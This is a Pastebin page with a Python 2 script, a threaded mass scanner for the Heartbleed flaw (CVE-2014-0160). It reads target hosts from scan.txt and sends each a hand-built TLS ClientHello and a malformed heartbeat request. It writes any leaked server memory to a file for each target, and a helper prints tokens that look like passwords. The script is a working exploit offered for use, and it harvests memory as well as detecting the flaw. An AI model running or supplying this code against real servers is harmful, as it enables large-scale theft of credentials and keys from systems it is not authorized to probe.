SHARE
TWEET

Heartbeat_scanner.py

theboogymaster Apr 9th, 2014 2,446 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket, ssl, pprint
  2. import Queue
  3. import threading,time,sys,select,struct,urllib,time,re,os
  4.  
  5.  
  6. '''
  7.  
  8.    16 03 02 00 31 # TLS Header
  9.    01 00 00 2d # Handshake header
  10.    03 02 # ClientHello field: version number (TLS 1.1)
  11.    50 0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 \
  12.    33 41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random
  13.    00 # ClientHello field: session id
  14.    00 04 # ClientHello field: cipher suite length
  15.    00 33 c0 11 # ClientHello field: cipher suite(s)
  16.    01 # ClientHello field: compression support, length
  17.    00 # ClientHello field: compression support, no compression (0)
  18.    00 00 # ClientHello field: extension length (0)
  19.  
  20. '''
  21.  
  22.  
  23.  
  24. hello_packet = "16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex')
  25. hb_packet = "1803020003014000".decode('hex')
  26.  
  27. def password_parse(the_response):
  28.     the_response_nl= the_response.split(' ')
  29.     #Interesting Paramaters found:
  30.     for each_item in the_response_nl:
  31.         if "=" in each_item or "password" in each_item:
  32.             print each_item
  33.  
  34.  
  35. def recv_timeout(the_socket,timeout=2):
  36.     #make socket non blocking
  37.     the_socket.setblocking(0)
  38.  
  39.     #total data partwise in an array
  40.     total_data=[];
  41.     data='';
  42.  
  43.     #beginning time
  44.     begin=time.time()
  45.     while 1:
  46.         if total_data and time.time()-begin > timeout:
  47.             break
  48.  
  49.         elif time.time()-begin > timeout*2:
  50.             break
  51.  
  52.         try:
  53.             data = the_socket.recv(8192)
  54.             if data:
  55.                 total_data.append(data)
  56.                 #change the beginning time for measurement
  57.                 begin=time.time()
  58.             else:
  59.                 #sleep for sometime to indicate a gap
  60.                 time.sleep(0.1)
  61.         except:
  62.             pass
  63.  
  64.     return ''.join(total_data)
  65.  
  66.  
  67. def tls(target_addr):
  68.  
  69.     try:
  70.  
  71.         server_port =443
  72.         target_addr = target_addr.strip()
  73.  
  74.         if ":" in target_addr:
  75.             server_port = target_addr.split(":")[1]
  76.             target_addr = target_addr.split(":")[0]
  77.  
  78.         client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  79.         sys.stdout.flush()
  80.         print >>sys.stderr, '\n[+]Scanning  server %s' % target_addr , "\n"
  81.         print "##############################################################"
  82.         sys.stdout.flush()
  83.         client_socket .connect((target_addr, int(server_port)))
  84.         #'Sending Hello request...'
  85.         client_socket.send(hello_packet)
  86.         recv_timeout(client_socket,3)
  87.         print 'Sending heartbeat request...'
  88.         client_socket.send(hb_packet)
  89.         data = recv_timeout(client_socket,3)
  90.         if len(data) > 7 :
  91.             print "[-] ",target_addr,' Vulnerable Server ...\n'
  92.             #print data
  93.             if os.path.exists(target_addr+".txt"):
  94.                 file_write = open(target_addr+".txt", 'a+')
  95.             else:
  96.                 file_write = file(target_addr+".txt", "w")
  97.             file_write.write(data)
  98.         else :
  99.             print "[-] ",target_addr,' Not Vulnerable  ...'
  100.     except Exception as e:
  101.         print e,target_addr,server_port
  102.  
  103.  
  104.  
  105. class BinaryGrab(threading.Thread):
  106.     """Threaded Url Grab"""
  107.     def __init__(self, queue):
  108.         threading.Thread.__init__(self)
  109.         self.queue = queue
  110.  
  111.     def run(self):
  112.         while True:
  113.             url = self.queue.get()
  114.             tls(url)
  115.             #Scan targets here
  116.  
  117.             #signals to queue job is done
  118.             self.queue.task_done()
  119.  
  120.  
  121.  
  122. start = time.time()
  123.  
  124. def manyurls(server_addr):
  125.     querange = len(server_addr)
  126.     queue = Queue.Queue()
  127.  
  128.     #spawn a pool of threads, and pass them queue instance
  129.     for i in range(int(querange)):
  130.         t = BinaryGrab(queue)
  131.         t.setDaemon(True)
  132.         t.start()
  133.  
  134.     #populate queue with data
  135.     for target in server_addr:
  136.  
  137.         queue.put(target)
  138.  
  139.     #wait on the queue until everything has been processed
  140.     queue.join()
  141. if __name__ == "__main__":
  142.     # Kepp all ur targets in scan.txt in the same folder.
  143.     server_addr = []
  144.     print "[+] cve-2014-0160 Mass Scanner by Rahul Sasi (fb1h2s)"
  145.     print "[+] Read More here http://www.garage4hackers.com/entry.php?b=2551"
  146.     read_f = open("scan.txt", "r")
  147.     server_addr = read_f.readlines()
  148.     #or provide names here
  149.     #server_addr = ['yahoo.com']
  150.     manyurls(server_addr)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top